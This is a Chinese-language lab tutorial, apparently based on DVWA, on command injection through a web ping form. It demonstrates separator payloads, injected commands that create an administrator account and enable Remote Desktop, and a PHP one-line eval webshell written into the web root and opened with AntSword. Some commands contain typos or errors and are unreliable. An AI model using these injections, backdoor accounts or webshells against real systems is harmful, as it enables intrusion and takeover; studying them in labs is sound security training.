2. 原理
- 在根源上應用系統從設計上要給用戶提供一個指定的遠程命令操作的接口。
- 漏洞主要出現在常見的路由器、防火墻、入侵檢測等設備的web管理界面上。在管理界面提供了一個ping服務。
- 提交后,系統對該IP進行ping,并且返回結果。
- 如果后臺服務器并沒有對其進行嚴格的過濾或者篩選時,那攻擊者提交一個具有危險的命令就會被后臺執行,從而可以進行控制整個后臺服務。
- 要掌握過濾
3. 執行方式
管道符:
“ | ” 直接執行后面的語句 ping127.0.0.1whoami
“ || ” 前面的語句執行出錯則執行后面的語句 ping127.o.0.1jwhoami
“ & ” 前面的語句為假則執行后面的語句 ping127.0.0.1&whoami
”&&“ 前面的語句為假,直接出錯,前面的語句為真,執行后面的語句 ping127.0.0.1&&whoami
4. 符號操作
4.1. |whoami
這是一個簡單的命令執行,輸入網址進行ping服務
我們使用上面的管道符進行實驗
172.220.52.186|whoami
| :這個是不管前面是什么,直接執行后面的語句
IP地址|命令
命令執行成功如上圖所示
4.2. ||ipconfig
前面出錯執行后面語句
asdfa||ipconfig 命令執行查看ip
4.3. &whoami
哪一個對了執行哪一個
&:當前面一個出錯則可以執行后面的,
asdf&whoami
前面ping的通則執行前面的 172.220.52.186&whomi
4.4. &&ipconfig
前面的語句為假,直接出錯,前面的語句為真,執行兩個語句
ping127.0.0.1&&whoami 前面正常,兩個執行
27.0.0.1&&whoami,出錯,后面不執行
上面該dvwa靶場實驗練習管道符,管道符為命令執行重要符號。
熟悉了管道符正常操作后進行實戰
5. 模擬遠程連接
任務:通過命令執行漏洞,對目標靶機侵入創建虛擬賬戶,并對其進行遠程訪問。
熟記指令
- 創建用戶:net user yuancheng 123/add //創建yuancheng密碼為123
- 查看用戶:net user
- 將用戶添加到管理員組: 127.0.0.1&net localgroup Administrators yuancheng /add
- 開啟遠程管理服務: 127.0.0.1&net user yuancheng /active:yes
特況:
如果連不上可能遠程桌面功能沒有打開,使用如下命令打開:
asdf&add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
5.1. 開始
asdf&net user yuancheng 123456 /add
呃,指令不成功,直接去靶機創建用戶并提升為管理員
net user yuancheng 123456 /add //如下圖所示
net localgroup Administrators yuancheng /add //提管理員
遠程連接
輸入密碼
ok,連接成功
6. 寫馬
寫入一句話木馬并使用webshell連接
熟記指令:
- 查看當前路徑 chdir //查看路徑,之后將一句話木馬寫入該路徑
- 查看 C 盤下的文件 dir C:\ //可以看到C盤文件
- 寫入一句話木馬、用 webshell 管理工具連接成功 寫入一句話木馬、用 webshell 管理工具連接
echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php
- 蟻劍連接
6.1. 開始
查看路徑
dir C:\ 查看文件情況
將其木馬寫入www即可
echo "<?php @eval($_POST['cmd']);?>" > C:\phpstudy\PHPTutorial\WWW\webshell.php
使用蟻劍連接,在木馬存在的目錄
C:\phpstudy\PHPTutorial\WWW\webshell.php
可以查看到文件